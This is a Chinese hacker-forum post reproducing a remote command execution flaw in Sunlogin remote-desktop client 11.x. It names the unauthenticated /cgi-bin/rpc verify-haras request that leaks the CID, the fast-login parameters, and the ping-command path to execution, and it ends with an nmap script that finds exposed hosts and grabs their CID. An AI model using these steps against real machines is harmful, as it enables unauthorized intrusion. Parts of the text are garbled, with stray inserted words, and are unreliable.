• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

黑客入侵滲透測試&向日葵RCE漏洞复现分析


Recommended Posts

复现参考:太空老哥的《向日葵远程命令执行漏洞分析》

复现环境

漏洞范围:小于或类似11.x
复现的版本:11.0.0.33162

HIjjRU.png

复现过程

这里监视了检查接口、路由、接口这三个接口
首先脱壳,向日葵加了UPX,upx -d脱掉可以

HIvCZR.png

向着今天的服务端口,找到 Sunlog 的 PID 在寻找端口即可登录服务

HIviIx.png

向日葵在启动的时候会开启该服务,端口在服务里(没更)。 向日葵的端口是4w-5w

HIvERO.png

可以根据PDF获取CID才能利用先F12搜索CID中的F12CID

HIveQe.png

(先连接一次向日葵然后在log里可以看到CID,188bet登录位置:SunloginClient\log\sunlogin_service.<日期>.log)

HIv1FP.png

可以根据 PDF 中的访问/cgi-bin/rpc 无法授权获取到 CID。上级就是路由了)
(懒得截图,处理函数是sub_140E1C954)

HIvJSS.png

当满足action=verify-haras会返回verify_string而和CID对比则一致

HIvaes.png
HIvBF0.png

当为action为fast-login时,是识别和本地验证码的处理,认证成功后也可以获取CID码

HIvrWT.png
HIvcy4.png
HIv5Y6.png
HIx64P.png

参数需要:action=fast-login&fastcode=<本地识别码>&verify_string=<本地验证>&use_custom_password=1

HHxec6.png

也可以通过login.cgi验证获取CID

HHx34A.png
HIzPC6.png
HIzi8K.png

检查接口判断RCE
获取cmd值后,是否存在ping命令然后跳到LABEL_27,调用sub_140E20B64执行命令

HIzVDH.png
HIztVs.png
HHxkN9.png
HIzBxU.png

认证接口
返回路由搜索,跟踪上一级(或者:{“success”:false,”msg”:”Verification failure”})

HIzgaR.png

可以看到判断 cookie 是否存在和 CID 的最后判断,最后确定 CID v13 CID 是否正确

HIzWPx.png
HIzHZd.png

是路径是下面有一个请求到sub_14061D284(如果也是刚刚的路由)

HIzXJP.png

nmap检测脚本:

local http=require "http"
local shortport=require "shortport"
local stdnse=require "stdnse"
local string=require "string"
local vulns=require "vulns"
local json=require "json"


portrule=function(host,port)
        if (port.state=="open") and (port.protocol=="tcp") then
                return true
        end
end


action=function(host,port)
        local status=stdnse.output_table()
        local url=string.format("http://%s:%s",host.ip,port.number)
        local banner="{\"success\":false,\"msg\":\"Verification failure\"}"
        local headers={header={}}
        headers["header"]["User-Agent"]="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
        local rqt=http.get_url(url,headers)
        if (rqt.status==200) and (string.match(rqt.body,banner)) then
                status.banner="SunloginClient"
                local uri="/cgi-bin/rpc"
                local postdata="action=verify-haras"
                local cid_check=http.post(host,port,uri,nil,true,postdata)
                if(cid_check.status==200) then
                        local json_check,json_data=json.parse(cid_check.body)
                        if (json_data["enabled"]=="1") then
                                status.rce="YES"
                                status.cid=json_data["verify_string"]
                        end
                end
                if (status~=nil) then
                        return status
                end
        end
end
HoSpLQ.png
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now